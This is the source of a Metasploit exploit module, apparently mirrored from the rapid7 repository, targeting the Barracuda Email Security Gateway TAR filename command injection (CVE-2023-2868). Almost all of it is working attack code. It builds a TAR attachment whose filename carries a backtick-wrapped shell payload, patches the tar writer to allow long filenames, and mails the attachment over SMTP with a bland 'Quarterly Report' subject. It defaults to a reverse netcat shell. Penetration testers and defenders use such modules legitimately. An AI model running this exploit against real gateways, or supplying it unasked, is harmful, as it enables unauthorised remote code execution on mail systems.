Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
55805 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Exploit::Remote::SMTPDeliver

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Barracuda ESG TAR Filename Command Injection',

17
        'Description' => %q{

18
          This module exploits CVE-2023-2868, a command injection vulnerability in

19
          Barracuda Email Security Gateway (ESG) appliances. The vulnerability exists

20
          in how the ESG processes TAR file attachments - filenames containing shell

21
          metacharacters (backticks) are passed directly to shell commands during

22
          extraction, allowing remote command execution.

23


24
          The exploit sends an email with a specially crafted TAR attachment where

25
          the filename contains a backtick-wrapped command. When the ESG processes

26
          this attachment, the command is executed as the mail processing user.

27


28
          Note: Payload execution may take 30-90 seconds after email delivery.

29
          Amavisd queues and processes attachments asynchronously.

30


31
          Affected versions: Barracuda ESG firmware prior to May 2023 patch.

32


33
          Payloads containing single quotes or backticks are incompatible with

34
          the injection mechanism. Use cmd/unix/generic with a custom CMD for

35
          specialized payload requirements.

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => [

39
          'Mandiant', # Discovery and analysis

40
          'cfielding-r7', # Original PoC

41
          'Curt Hyvarinen' # Metasploit module

42
        ],

43
        'References' => [

44
          ['CVE', '2023-2868'],

45
          ['URL', 'https://www.barracuda.com/company/legal/esg-vulnerability'],

46
          ['URL', 'https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally'],

47
          ['URL', 'https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868']

48
        ],

49
        'DisclosureDate' => '2023-05-23',

50
        'Platform' => 'unix',

51
        'Arch' => ARCH_CMD,

52
        'Privileged' => false,

53
        'Payload' => {

54
          'Space' => 490,

55
          'DisableNops' => true,

56
          'BadChars' => "'\`\x00\r\n"

57
        },

58
        'Targets' => [

59
          ['Unix Command', {}]

60
        ],

61
        'DefaultTarget' => 0,

62
        'DefaultOptions' => {

63
          'PAYLOAD' => 'cmd/unix/reverse_netcat'

64
        },

65
        'Notes' => {

66
          'Stability' => [CRASH_SAFE],

67
          'Reliability' => [REPEATABLE_SESSION],

68
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

69
        }

70
      )

71
    )

72


73
    register_options(

74
      [

75
        OptString.new('MAILTO', [true, 'Target email address on the ESG']),

76
        OptString.new('MAILFROM', [true, 'Sender email address', '[email protected]']),

77
        OptString.new('SUBJECT', [true, 'Email subject line', 'Quarterly Report']),

78
        OptString.new('BODY', [false, 'Email body text (default: random string)']),

79
        OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)'])

80
      ]

81
    )

82
  end

83


84
  def check

85
    connect

86
    banner_str = banner.to_s

87
    if banner_str =~ /barracuda/i

88
      return CheckCode::Detected('Barracuda ESG detected in SMTP banner')

89
    end

90


91
    if banner_str =~ /ESMTP/i

92
      return CheckCode::Unknown('SMTP server detected, but cannot confirm Barracuda ESG')

93
    end

94


95
    CheckCode::Safe('No SMTP banner detected')

96
  rescue Rex::ConnectionError => e

97
    CheckCode::Unknown("Connection failed: #{e.message}")

98
  ensure

99
    disconnect

100
  end

101


102
  def exploit

103
    cmd = payload.encoded

104


105
    # Wrap payload in critical format for command injection:

106
    # Outer single quotes prevent immediate shell parsing,

107
    # backticks trigger command substitution when processed by vulnerable code

108
    malicious_filename = "'`#{cmd}`'"

109


110
    print_status('Generating malicious TAR with payload filename')

111
    vprint_status("Payload filename length: #{malicious_filename.length} bytes")

112
    tar_data = create_malicious_tar(malicious_filename)

113


114
    print_status('Composing email with TAR attachment')

115
    email_data = generate_exploit_email(tar_data)

116


117
    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")

118
    send_message(email_data)

119


120
    print_good('Email sent successfully')

121
    print_status('Payload will execute when ESG processes the attachment')

122
  end

123


124
  def create_malicious_tar(malicious_filename)

125
    # Rex::Tar::Writer inherits from Gem::Package::TarWriter which enforces a

126
    # 100-byte filename limit. Override split_name to allow longer filenames

127
    # with special characters for the injection payload.

128


129
    original_split = Rex::Tar::Writer.instance_method(:split_name)

130


131
    Rex::Tar::Writer.define_method(:split_name) do |name|

132
      prefix = ''

133
      if name.bytesize > 100

134
        parts = name.split('/', -1)

135
        name = parts.pop

136
        prefix = parts.join('/')

137
        while !parts.empty? && (prefix.bytesize > 155 || name.empty?)

138
          name = parts.pop + '/' + name

139
          prefix = parts.join('/')

140
        end

141
      end

142
      [name, prefix]

143
    end

144


145
    tar_io = StringIO.new

146
    Rex::Tar::Writer.new(tar_io) do |tar|

147
      content = Rex::Text.rand_text_alpha(32)

148
      tar.add_file_simple(malicious_filename, 0o644, content.length) do |io|

149
        io.write(content)

150
      end

151
    end

152


153
    # Restore original method to avoid affecting other code

154
    Rex::Tar::Writer.define_method(:split_name, original_split)

155


156
    tar_io.string

157
  end

158


159
  def generate_exploit_email(tar_data)

160
    msg = Rex::MIME::Message.new

161
    msg.mime_defaults

162
    msg.from = datastore['MAILFROM']

163
    msg.to = datastore['MAILTO']

164
    msg.subject = datastore['SUBJECT']

165


166
    # Add text body

167
    body_text = datastore['BODY'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(rand(16..32)) : datastore['BODY']

168
    msg.add_part(body_text, 'text/plain', nil, 'inline')

169


170
    # Add TAR attachment

171
    attachment_name = datastore['FILENAME'].to_s.strip.empty? ? Rex::Text.rand_text_alpha(8) + '.tar' : datastore['FILENAME']

172
    msg.add_part_attachment(tar_data, attachment_name)

173


174
    msg.to_s

175
  end

176
end

177


178